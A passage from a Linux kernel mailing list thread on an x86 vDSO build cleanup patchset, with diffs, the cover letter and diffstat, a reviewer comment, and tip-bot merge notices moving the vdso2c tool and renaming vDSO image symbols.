+++ b/arch/x86/entry/vdso/vdso64/Makefile
@@ -0,0 +1,46 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# 64-bit vDSO images for x86.
+#
+
+# The vDSOs built in this directory
+vdsos-y := 64
+vdsos-$(CONFIG_X86_X32_ABI) += x32
+
+# Files to link into the vDSO:
+vobjs-y := note.o vclock_gettime.o vgetcpu.o
+vobjs-y += vgetrandom.o vgetrandom-chacha.o
+vobjs-$(CONFIG_X86_SGX) += vsgx.o
+
+# Compilation flags
+flags-y := -DBUILD_VDSO64 -m64 -mcmodel=small
+
+# The location of this include matters!
+include $(src)/../common/Makefile.include
+
+#
+# X32 processes use x32 vDSO to access 64bit kernel data.
+#
+# Build x32 vDSO image:
+# 1. Compile x32 vDSO as 64bit.
+# 2. Convert object files to x32.
+# 3. Build x32 VDSO image with x32 objects, which contains 64bit codes
+# so that it can reach 64bit address space with 64bit pointers.
+#
+
+# Convert 64bit object file to x32 for x32 vDSO.
+quiet_cmd_x32 = X32 $@
+ cmd_x32 = $(OBJCOPY) -O elf32-x86-64 $< $@
+
+$(obj)/%-x32.o: $(obj)/%.o FORCE
+ $(call if_changed,x32)
+
+vobjsx32 = $(patsubst %.o,%-x32.o,$(vobjs))
+targets += $(patsubst %.o,%-x32.o,$(vobjs-y))
+
+# Linker options for the vdso
+VDSO_LDFLAGS_64 := -m elf_x86_64 -soname linux-vdso.so.1 -z max-page-size=4096
+VDSO_LDFLAGS_x32 := $(subst elf_x86_64,elf32_x86_64,$(VDSO_LDFLAGS_64))
+
+$(obj)/vdso64.so.dbg: $(vobjs)
+$(obj)/vdsox32.so.dbg: $(vobjsx32)
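At the ELF-header level, the `objcopy -O elf32-x86-64` step in the rule above flips only the file class: an x32 object is ELFCLASS32 while keeping the 64-bit machine type EM_X86_64, which is how x32 code reaches 64-bit kernel data while using 32-bit pointers. A minimal sketch of that header difference (constants from the ELF specification; an illustration of the result, not the objcopy implementation):

```python
import struct

EM_X86_64 = 62            # e_machine for x86-64, shared by x32 objects
ELFCLASS32, ELFCLASS64 = 1, 2
ET_REL = 1                # relocatable object file

def elf_header_start(elf_class: int) -> bytes:
    """Magic + EI_CLASS + little-endian EI_DATA + EI_VERSION, then e_type/e_machine."""
    e_ident = b"\x7fELF" + bytes([elf_class, 1, 1]) + b"\0" * 9
    return e_ident + struct.pack("<HH", ET_REL, EM_X86_64)

h64 = elf_header_start(ELFCLASS64)    # what the compiler emits for -m64
hx32 = elf_header_start(ELFCLASS32)   # what objcopy -O elf32-x86-64 produces

# e_machine sits at offset 18 in both ELF32 and ELF64 headers
assert struct.unpack_from("<H", h64, 18) == struct.unpack_from("<H", hx32, 18)
assert h64[4] != hx32[4]              # only EI_CLASS differs
```

This is also why step 1 of the comment compiles x32 objects as 64-bit first: the code itself is ordinary x86-64, and only the container format needs converting.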
diff --git a/arch/x86/entry/vdso/vdso64/note.S b/arch/x86/entry/vdso/vdso64/note.S
new file mode 100644
index 000000000000..62d8aa51ce99
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/note.S
@@ -0,0 +1 @@
+#include "common/note.S"
diff --git a/arch/x86/entry/vdso/vdso64/vclock_gettime.c b/arch/x86/entry/vdso/vdso64/vclock_gettime.c
new file mode 100644
index 000000000000..1481f0021b9f
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vclock_gettime.c
@@ -0,0 +1 @@
+#include "common/vclock_gettime.c"
diff --git a/arch/x86/entry/vdso/vdso.lds.S b/arch/x86/entry/vdso/vdso64/vdso64.lds.S
similarity index 94%
rename from arch/x86/entry/vdso/vdso.lds.S
rename to arch/x86/entry/vdso/vdso64/vdso64.lds.S
index 0bab5f4af6d1..5ce3f2b6373a 100644
--- a/arch/x86/entry/vdso/vdso.lds.S
+++ b/arch/x86/entry/vdso/vdso64/vdso64.lds.S
@@ -9,7 +9,7 @@
#define BUILD_VDSO64
-#include "vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/*
* This controls what userland symbols we export from the vDSO.
diff --git a/arch/x86/entry/vdso/vdsox32.lds.S b/arch/x86/entry/vdso/vdso64/vdsox32.lds.S
similarity index 92%
rename from arch/x86/entry/vdso/vdsox32.lds.S
rename to arch/x86/entry/vdso/vdso64/vdsox32.lds.S
index 16a8050a4fb6..3dbd20c8dacc 100644
--- a/arch/x86/entry/vdso/vdsox32.lds.S
+++ b/arch/x86/entry/vdso/vdso64/vdsox32.lds.S
@@ -9,7 +9,7 @@
#define BUILD_VDSOX32
-#include "vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/*
* This controls what userland symbols we export from the vDSO.
diff --git a/arch/x86/entry/vdso/vdso64/vgetcpu.c b/arch/x86/entry/vdso/vdso64/vgetcpu.c
new file mode 100644
index 000000000000..00cc8325a020
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vgetcpu.c
@@ -0,0 +1 @@
+#include "common/vgetcpu.c"
diff --git a/arch/x86/entry/vdso/vgetrandom-chacha.S b/arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
similarity index 100%
rename from arch/x86/entry/vdso/vgetrandom-chacha.S
rename to arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
diff --git a/arch/x86/entry/vdso/vgetrandom.c b/arch/x86/entry/vdso/vdso64/vgetrandom.c
similarity index 91%
rename from arch/x86/entry/vdso/vgetrandom.c
rename to arch/x86/entry/vdso/vdso64/vgetrandom.c
index 430862b8977c..6a95d36b12d9 100644
--- a/arch/x86/entry/vdso/vgetrandom.c
+++ b/arch/x86/entry/vdso/vdso64/vgetrandom.c
@@ -4,7 +4,7 @@
*/
#include <linux/types.h>
-#include "../../../../lib/vdso/getrandom.c"
+#include "lib/vdso/getrandom.c"
ssize_t __vdso_getrandom(void *buffer, size_t len, unsigned int flags, void *opaque_state, size_t opaque_len)
{
diff --git a/arch/x86/entry/vdso/vsgx.S b/arch/x86/entry/vdso/vdso64/vsgx.S
similarity index 100%
rename from arch/x86/entry/vdso/vsgx.S
rename to arch/x86/entry/vdso/vdso64/vsgx.S
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:36 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation in vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware, or FRED-capable 64-bit
hardware), skip the stack handling in the 32-bit kernel entry code and
call int $0x80 directly from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Bizjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Bizjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
On 06/01/2026 9:18 pm, H. Peter Anvin wrote:
The v4/v4.1 notes will presumably want dropping before committing?
|
{
"author": "Andrew Cooper <andrew.cooper3@citrix.com>",
"date": "Wed, 7 Jan 2026 12:10:52 +0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 93d73005bff4f600696ce30e366e742c3373b13d
Gitweb: https://git.kernel.org/tip/93d73005bff4f600696ce30e366e742c3373b13d
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:25:55 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 15:33:20 -08:00
x86/entry/vdso: Rename vdso_image_* to vdso*_image
The vdso .so files are named vdso*.so. These structures are binary
images and descriptions of these files, so it is more consistent for
them to have a naming that more directly mirrors the filenames.
It is also very slightly more compact (by one character...) and
simplifies the Makefile just a little bit.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-2-hpa@zytor.com
---
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 ++++-------
arch/x86/entry/vdso/Makefile | 8 ++++----
arch/x86/entry/vdso/vma.c | 10 +++++-----
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +++---
arch/x86/kernel/process_64.c | 6 +++---
arch/x86/kernel/signal_32.c | 4 ++--
8 files changed, 23 insertions(+), 26 deletions(-)
diff --git a/arch/x86/entry/syscall_32.c b/arch/x86/entry/syscall_32.c
index a67a644..8e82957 100644
--- a/arch/x86/entry/syscall_32.c
+++ b/arch/x86/entry/syscall_32.c
@@ -319,7 +319,7 @@ __visible noinstr bool do_fast_syscall_32(struct pt_regs *regs)
* convention. Adjust regs so it looks like we entered using int80.
*/
unsigned long landing_pad = (unsigned long)current->mm->context.vdso +
- vdso_image_32.sym_int80_landing_pad;
+ vdso32_image.sym_int80_landing_pad;
/*
* SYSENTER loses EIP, and even SYSCALL32 needs us to skip forward
diff --git a/arch/x86/entry/vdso/.gitignore b/arch/x86/entry/vdso/.gitignore
index 37a6129..eb60859 100644
--- a/arch/x86/entry/vdso/.gitignore
+++ b/arch/x86/entry/vdso/.gitignore
@@ -1,8 +1,5 @@
# SPDX-License-Identifier: GPL-2.0-only
-vdso.lds
-vdsox32.lds
-vdso32-syscall-syms.lds
-vdso32-sysenter-syms.lds
-vdso32-int80-syms.lds
-vdso-image-*.c
-vdso2c
+*.lds
+*.so
+*.so.dbg
+vdso*-image.c
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index f247f5f..7f83302 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -16,9 +16,9 @@ vobjs-$(CONFIG_X86_SGX) += vsgx.o
obj-y += vma.o extable.o
# vDSO images to build:
-obj-$(CONFIG_X86_64) += vdso-image-64.o
-obj-$(CONFIG_X86_X32_ABI) += vdso-image-x32.o
-obj-$(CONFIG_COMPAT_32) += vdso-image-32.o vdso32-setup.o
+obj-$(CONFIG_X86_64) += vdso64-image.o
+obj-$(CONFIG_X86_X32_ABI) += vdsox32-image.o
+obj-$(CONFIG_COMPAT_32) += vdso32-image.o vdso32-setup.o
vobjs := $(addprefix $(obj)/, $(vobjs-y))
vobjs32 := $(addprefix $(obj)/, $(vobjs32-y))
@@ -44,7 +44,7 @@ hostprogs += vdso2c
quiet_cmd_vdso2c = VDSO2C $@
cmd_vdso2c = $(obj)/vdso2c $< $(<:%.dbg=%) $@
-$(obj)/vdso-image-%.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
+$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
$(call if_changed,vdso2c)
#
diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
index afe105b..8f98c2d 100644
--- a/arch/x86/entry/vdso/vma.c
+++ b/arch/x86/entry/vdso/vma.c
@@ -65,7 +65,7 @@ static vm_fault_t vdso_fault(const struct vm_special_mapping *sm,
static void vdso_fix_landing(const struct vdso_image *image,
struct vm_area_struct *new_vma)
{
- if (in_ia32_syscall() && image == &vdso_image_32) {
+ if (in_ia32_syscall() && image == &vdso32_image) {
struct pt_regs *regs = current_pt_regs();
unsigned long vdso_land = image->sym_int80_landing_pad;
unsigned long old_land_addr = vdso_land +
@@ -230,7 +230,7 @@ static int load_vdso32(void)
if (vdso32_enabled != 1) /* Other values all mean "disabled" */
return 0;
- return map_vdso(&vdso_image_32, 0);
+ return map_vdso(&vdso32_image, 0);
}
int arch_setup_additional_pages(struct linux_binprm *bprm, int uses_interp)
@@ -239,7 +239,7 @@ int arch_setup_additional_pages(struct linux_binprm *bprm, int uses_interp)
if (!vdso64_enabled)
return 0;
- return map_vdso(&vdso_image_64, 0);
+ return map_vdso(&vdso64_image, 0);
}
return load_vdso32();
@@ -252,7 +252,7 @@ int compat_arch_setup_additional_pages(struct linux_binprm *bprm,
if (IS_ENABLED(CONFIG_X86_X32_ABI) && x32) {
if (!vdso64_enabled)
return 0;
- return map_vdso(&vdso_image_x32, 0);
+ return map_vdso(&vdsox32_image, 0);
}
if (IS_ENABLED(CONFIG_IA32_EMULATION))
@@ -267,7 +267,7 @@ bool arch_syscall_is_vdso_sigreturn(struct pt_regs *regs)
const struct vdso_image *image = current->mm->context.vdso_image;
unsigned long vdso = (unsigned long) current->mm->context.vdso;
- if (in_ia32_syscall() && image == &vdso_image_32) {
+ if (in_ia32_syscall() && image == &vdso32_image) {
if (regs->ip == vdso + image->sym_vdso32_sigreturn_landing_pad ||
regs->ip == vdso + image->sym_vdso32_rt_sigreturn_landing_pad)
return true;
diff --git a/arch/x86/include/asm/elf.h b/arch/x86/include/asm/elf.h
index 6c8fdc9..2ba5f16 100644
--- a/arch/x86/include/asm/elf.h
+++ b/arch/x86/include/asm/elf.h
@@ -361,7 +361,7 @@ else if (IS_ENABLED(CONFIG_IA32_EMULATION)) \
#define VDSO_ENTRY \
((unsigned long)current->mm->context.vdso + \
- vdso_image_32.sym___kernel_vsyscall)
+ vdso32_image.sym___kernel_vsyscall)
struct linux_binprm;
diff --git a/arch/x86/include/asm/vdso.h b/arch/x86/include/asm/vdso.h
index b7253ef..e8afbe9 100644
--- a/arch/x86/include/asm/vdso.h
+++ b/arch/x86/include/asm/vdso.h
@@ -27,9 +27,9 @@ struct vdso_image {
long sym_vdso32_rt_sigreturn_landing_pad;
};
-extern const struct vdso_image vdso_image_64;
-extern const struct vdso_image vdso_image_x32;
-extern const struct vdso_image vdso_image_32;
+extern const struct vdso_image vdso64_image;
+extern const struct vdso_image vdsox32_image;
+extern const struct vdso_image vdso32_image;
extern int __init init_vdso_image(const struct vdso_image *image);
diff --git a/arch/x86/kernel/process_64.c b/arch/x86/kernel/process_64.c
index 432c0a0..08e72f4 100644
--- a/arch/x86/kernel/process_64.c
+++ b/arch/x86/kernel/process_64.c
@@ -941,14 +941,14 @@ long do_arch_prctl_64(struct task_struct *task, int option, unsigned long arg2)
#ifdef CONFIG_CHECKPOINT_RESTORE
# ifdef CONFIG_X86_X32_ABI
case ARCH_MAP_VDSO_X32:
- return prctl_map_vdso(&vdso_image_x32, arg2);
+ return prctl_map_vdso(&vdsox32_image, arg2);
# endif
# ifdef CONFIG_IA32_EMULATION
case ARCH_MAP_VDSO_32:
- return prctl_map_vdso(&vdso_image_32, arg2);
+ return prctl_map_vdso(&vdso32_image, arg2);
# endif
case ARCH_MAP_VDSO_64:
- return prctl_map_vdso(&vdso_image_64, arg2);
+ return prctl_map_vdso(&vdso64_image, arg2);
#endif
#ifdef CONFIG_ADDRESS_MASKING
case ARCH_GET_UNTAG_MASK:
diff --git a/arch/x86/kernel/signal_32.c b/arch/x86/kernel/signal_32.c
index 42bbc42..e55cf19 100644
--- a/arch/x86/kernel/signal_32.c
+++ b/arch/x86/kernel/signal_32.c
@@ -282,7 +282,7 @@ int ia32_setup_frame(struct ksignal *ksig, struct pt_regs *regs)
/* Return stub is in 32bit vsyscall page */
if (current->mm->context.vdso)
restorer = current->mm->context.vdso +
- vdso_image_32.sym___kernel_sigreturn;
+ vdso32_image.sym___kernel_sigreturn;
else
restorer = &frame->retcode;
}
@@ -368,7 +368,7 @@ int ia32_setup_rt_frame(struct ksignal *ksig, struct pt_regs *regs)
restorer = ksig->ka.sa.sa_restorer;
else
restorer = current->mm->context.vdso +
- vdso_image_32.sym___kernel_rt_sigreturn;
+ vdso32_image.sym___kernel_rt_sigreturn;
unsafe_put_user(ptr_to_compat(restorer), &frame->pretcode, Efault);
/*
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:01:26 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: a76108d05ee13cddb72b620752a80b2c3e87aee1
Gitweb: https://git.kernel.org/tip/a76108d05ee13cddb72b620752a80b2c3e87aee1
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:25:56 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 15:33:20 -08:00
x86/entry/vdso: Move vdso2c to arch/x86/tools
It is generally better to build tools in arch/x86/tools to keep host
cflags proliferation down, and to reduce makefile sequencing issues.
Move the vdso build tool vdso2c into arch/x86/tools in preparation for
refactoring the vdso makefiles.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-3-hpa@zytor.com
---
arch/x86/Makefile | 2 +-
arch/x86/entry/vdso/Makefile | 7 +-
arch/x86/entry/vdso/vdso2c.c | 233 +----------------------------------
arch/x86/entry/vdso/vdso2c.h | 208 +------------------------------
arch/x86/tools/Makefile | 15 +-
arch/x86/tools/vdso2c.c | 233 ++++++++++++++++++++++++++++++++++-
arch/x86/tools/vdso2c.h | 208 ++++++++++++++++++++++++++++++-
7 files changed, 455 insertions(+), 451 deletions(-)
delete mode 100644 arch/x86/entry/vdso/vdso2c.c
delete mode 100644 arch/x86/entry/vdso/vdso2c.h
create mode 100644 arch/x86/tools/vdso2c.c
create mode 100644 arch/x86/tools/vdso2c.h
diff --git a/arch/x86/Makefile b/arch/x86/Makefile
index 1d403a3..9ab7522 100644
--- a/arch/x86/Makefile
+++ b/arch/x86/Makefile
@@ -252,7 +252,7 @@ endif
archscripts: scripts_basic
- $(Q)$(MAKE) $(build)=arch/x86/tools relocs
+ $(Q)$(MAKE) $(build)=arch/x86/tools relocs vdso2c
###
# Syscall table generation
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index 7f83302..3d9b09f 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -38,13 +38,12 @@ VDSO_LDFLAGS_vdso.lds = -m elf_x86_64 -soname linux-vdso.so.1 \
$(obj)/vdso64.so.dbg: $(obj)/vdso.lds $(vobjs) FORCE
$(call if_changed,vdso_and_check)
-HOST_EXTRACFLAGS += -I$(srctree)/tools/include -I$(srctree)/include/uapi -I$(srctree)/arch/$(SUBARCH)/include/uapi
-hostprogs += vdso2c
+VDSO2C = $(objtree)/arch/x86/tools/vdso2c
quiet_cmd_vdso2c = VDSO2C $@
- cmd_vdso2c = $(obj)/vdso2c $< $(<:%.dbg=%) $@
+ cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
-$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
+$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(VDSO2C) FORCE
$(call if_changed,vdso2c)
#
diff --git a/arch/x86/entry/vdso/vdso2c.c b/arch/x86/entry/vdso/vdso2c.c
deleted file mode 100644
index f84e8f8..0000000
--- a/arch/x86/entry/vdso/vdso2c.c
+++ /dev/null
@@ -1,233 +0,0 @@
-// SPDX-License-Identifier: GPL-2.0-only
-/*
- * vdso2c - A vdso image preparation tool
- * Copyright (c) 2014 Andy Lutomirski and others
- *
- * vdso2c requires stripped and unstripped input. It would be trivial
- * to fully strip the input in here, but, for reasons described below,
- * we need to write a section table. Doing this is more or less
- * equivalent to dropping all non-allocatable sections, but it's
- * easier to let objcopy handle that instead of doing it ourselves.
- * If we ever need to do something fancier than what objcopy provides,
- * it would be straightforward to add here.
- *
- * We're keep a section table for a few reasons:
- *
- * The Go runtime had a couple of bugs: it would read the section
- * table to try to figure out how many dynamic symbols there were (it
- * shouldn't have looked at the section table at all) and, if there
- * were no SHT_SYNDYM section table entry, it would use an
- * uninitialized value for the number of symbols. An empty DYNSYM
- * table would work, but I see no reason not to write a valid one (and
- * keep full performance for old Go programs). This hack is only
- * needed on x86_64.
- *
- * The bug was introduced on 2012-08-31 by:
- * https://code.google.com/p/go/source/detail?r=56ea40aac72b
- * and was fixed on 2014-06-13 by:
- * https://code.google.com/p/go/source/detail?r=fc1cd5e12595
- *
- * Binutils has issues debugging the vDSO: it reads the section table to
- * find SHT_NOTE; it won't look at PT_NOTE for the in-memory vDSO, which
- * would break build-id if we removed the section table. Binutils
- * also requires that shstrndx != 0. See:
- * https://sourceware.org/bugzilla/show_bug.cgi?id=17064
- *
- * elfutils might not look for PT_NOTE if there is a section table at
- * all. I don't know whether this matters for any practical purpose.
- *
- * For simplicity, rather than hacking up a partial section table, we
- * just write a mostly complete one. We omit non-dynamic symbols,
- * though, since they're rather large.
- *
- * Once binutils gets fixed, we might be able to drop this for all but
- * the 64-bit vdso, since build-id only works in kernel RPMs, and
- * systems that update to new enough kernel RPMs will likely update
- * binutils in sync. build-id has never worked for home-built kernel
- * RPMs without manual symlinking, and I suspect that no one ever does
- * that.
- */
-
-#include <inttypes.h>
-#include <stdint.h>
-#include <unistd.h>
-#include <stdarg.h>
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-#include <fcntl.h>
-#include <err.h>
-
-#include <sys/mman.h>
-#include <sys/types.h>
-
-#include <tools/le_byteshift.h>
-
-#include <linux/elf.h>
-#include <linux/types.h>
-#include <linux/kernel.h>
-
-const char *outfilename;
-
-struct vdso_sym {
- const char *name;
- bool export;
-};
-
-struct vdso_sym required_syms[] = {
- {"VDSO32_NOTE_MASK", true},
- {"__kernel_vsyscall", true},
- {"__kernel_sigreturn", true},
- {"__kernel_rt_sigreturn", true},
- {"int80_landing_pad", true},
- {"vdso32_rt_sigreturn_landing_pad", true},
- {"vdso32_sigreturn_landing_pad", true},
-};
-
-__attribute__((format(printf, 1, 2))) __attribute__((noreturn))
-static void fail(const char *format, ...)
-{
- va_list ap;
- va_start(ap, format);
- fprintf(stderr, "Error: ");
- vfprintf(stderr, format, ap);
- if (outfilename)
- unlink(outfilename);
- exit(1);
- va_end(ap);
-}
-
-/*
- * Evil macros for little-endian reads and writes
- */
-#define GLE(x, bits, ifnot) \
- __builtin_choose_expr( \
- (sizeof(*(x)) == bits/8), \
- (__typeof__(*(x)))get_unaligned_le##bits(x), ifnot)
-
-extern void bad_get_le(void);
-#define LAST_GLE(x) \
- __builtin_choose_expr(sizeof(*(x)) == 1, *(x), bad_get_le())
-
-#define GET_LE(x) \
- GLE(x, 64, GLE(x, 32, GLE(x, 16, LAST_GLE(x))))
-
-#define PLE(x, val, bits, ifnot) \
- __builtin_choose_expr( \
- (sizeof(*(x)) == bits/8), \
- put_unaligned_le##bits((val), (x)), ifnot)
-
-extern void bad_put_le(void);
-#define LAST_PLE(x, val) \
- __builtin_choose_expr(sizeof(*(x)) == 1, *(x) = (val), bad_put_le())
-
-#define PUT_LE(x, val) \
- PLE(x, val, 64, PLE(x, val, 32, PLE(x, val, 16, LAST_PLE(x, val))))
-
-
-#define NSYMS ARRAY_SIZE(required_syms)
-
-#define BITSFUNC3(name, bits, suffix) name##bits##suffix
-#define BITSFUNC2(name, bits, suffix) BITSFUNC3(name, bits, suffix)
-#define BITSFUNC(name) BITSFUNC2(name, ELF_BITS, )
-
-#define INT_BITS BITSFUNC2(int, ELF_BITS, _t)
-
-#define ELF_BITS_XFORM2(bits, x) Elf##bits##_##x
-#define ELF_BITS_XFORM(bits, x) ELF_BITS_XFORM2(bits, x)
-#define ELF(x) ELF_BITS_XFORM(ELF_BITS, x)
-
-#define ELF_BITS 64
-#include "vdso2c.h"
-#undef ELF_BITS
-
-#define ELF_BITS 32
-#include "vdso2c.h"
-#undef ELF_BITS
-
-static void go(void *raw_addr, size_t raw_len,
- void *stripped_addr, size_t stripped_len,
- FILE *outfile, const char *name)
-{
- Elf64_Ehdr *hdr = (Elf64_Ehdr *)raw_addr;
-
- if (hdr->e_ident[EI_CLASS] == ELFCLASS64) {
- go64(raw_addr, raw_len, stripped_addr, stripped_len,
- outfile, name);
- } else if (hdr->e_ident[EI_CLASS] == ELFCLASS32) {
- go32(raw_addr, raw_len, stripped_addr, stripped_len,
- outfile, name);
- } else {
- fail("unknown ELF class\n");
- }
-}
-
-static void map_input(const char *name, void **addr, size_t *len, int prot)
-{
- off_t tmp_len;
-
- int fd = open(name, O_RDONLY);
- if (fd == -1)
- err(1, "open(%s)", name);
-
- tmp_len = lseek(fd, 0, SEEK_END);
- if (tmp_len == (off_t)-1)
- err(1, "lseek");
- *len = (size_t)tmp_len;
-
- *addr = mmap(NULL, tmp_len, prot, MAP_PRIVATE, fd, 0);
- if (*addr == MAP_FAILED)
- err(1, "mmap");
-
- close(fd);
-}
-
-int main(int argc, char **argv)
-{
- size_t raw_len, stripped_len;
- void *raw_addr, *stripped_addr;
- FILE *outfile;
- char *name, *tmp;
- int namelen;
-
- if (argc != 4) {
- printf("Usage: vdso2c RAW_INPUT STRIPPED_INPUT OUTPUT\n");
- return 1;
- }
-
- /*
- * Figure out the struct name. If we're writing to a .so file,
- * generate raw output instead.
- */
- name = strdup(argv[3]);
- namelen = strlen(name);
- if (namelen >= 3 && !strcmp(name + namelen - 3, ".so")) {
- name = NULL;
- } else {
- tmp = strrchr(name, '/');
- if (tmp)
- name = tmp + 1;
- tmp = strchr(name, '.');
- if (tmp)
- *tmp = '\0';
- for (tmp = name; *tmp; tmp++)
- if (*tmp == '-')
- *tmp = '_';
- }
-
- map_input(argv[1], &raw_addr, &raw_len, PROT_READ);
- map_input(argv[2], &stripped_addr, &stripped_len, PROT_READ);
-
